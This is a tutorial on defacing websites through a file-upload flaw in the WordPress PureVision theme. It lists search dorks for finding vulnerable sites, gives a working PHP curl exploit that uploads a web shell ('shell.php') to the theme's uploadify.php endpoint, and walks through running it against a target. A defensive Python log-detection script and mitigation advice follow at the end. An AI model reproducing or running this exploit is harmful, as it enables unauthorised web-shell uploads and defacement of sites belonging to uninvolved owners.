How to Deface Using the Wordpress Themes Purevision File Upload Vulnerability



Exploit title: Wordpress Themes Purevision File Upload Vulnerability
Dork: inurl:/wp-content/themes/purevision
          inurl:/wp-content/themes/purevision intext:index of
          Index of /wp-content/themes/purevision/

Requirements:
- XAMPP


Exploit:

 <?php

$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/purevision/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?> 

Tutorial:
- Open XAMPP and start Apache and MySQL
- Edit the exploit above, replacing example.com with your target's link
- Save the exploit in C: > xampp > php with a .php extension
- Run the exploit from cmd; the command is php exploit.php, then press Enter

If the number 1 is printed, the exploit succeeded, meaning the target is vulnerable
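For site owners, the request above leaves a recognisable trace in the web server's access log: a POST to uploadify.php under the theme folder, followed by requests for a script file served from that same folder. The following is an added detection example, not code from the original post; it assumes Apache combined log format, and the function name and sample log lines are constructed for illustration.

```python
import re

# Endpoint and upload folder as they appear in the request shown on this page.
UPLOAD_DIR = "/wp-content/themes/purevision/scripts/admin/uploadify/"
ENDPOINT = UPLOAD_DIR + "uploadify.php"
# Assumption: Apache combined log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def find_upload_abuse(lines):
    """Return (kind, client_ip, path) tuples for suspicious requests."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected log format
        path = m["path"].split("?", 1)[0]
        ok = m["status"].startswith("2")
        if m["method"] == "POST" and path == ENDPOINT:
            # A 2xx answer means the upload handler is still present and ran.
            kind = "upload_accepted" if ok else "upload_attempt"
            findings.append((kind, m["ip"], path))
        elif (ok and path != ENDPOINT and path.startswith(UPLOAD_DIR)
              and SCRIPT_RE.search(path)):
            # A script other than the handler was served from the upload folder.
            findings.append(("script_in_upload_dir", m["ip"], path))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2015:10:00:01 +0000] '
    '"GET /wp-content/themes/purevision/style.css HTTP/1.1" 200 5120 "-" "-"',
    f'198.51.100.7 - - [10/Mar/2015:10:02:11 +0000] "POST {ENDPOINT} HTTP/1.1" 200 1 "-" "-"',
    f'198.51.100.7 - - [10/Mar/2015:10:02:30 +0000] "GET {UPLOAD_DIR}shell.php HTTP/1.1" 200 312 "-" "-"',
    f'203.0.113.5 - - [11/Mar/2015:08:15:00 +0000] "POST {ENDPOINT} HTTP/1.1" 404 209 "-" "-"',
    f'203.0.113.5 - - [11/Mar/2015:08:15:02 +0000] "GET {UPLOAD_DIR}uploadify.css HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding)
```

Any "upload_accepted" or "script_in_upload_dir" finding means the upload folder should be inspected for unexpected files. Removing uploadify.php from the theme, or denying script execution in that folder, closes the path the request relies on.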




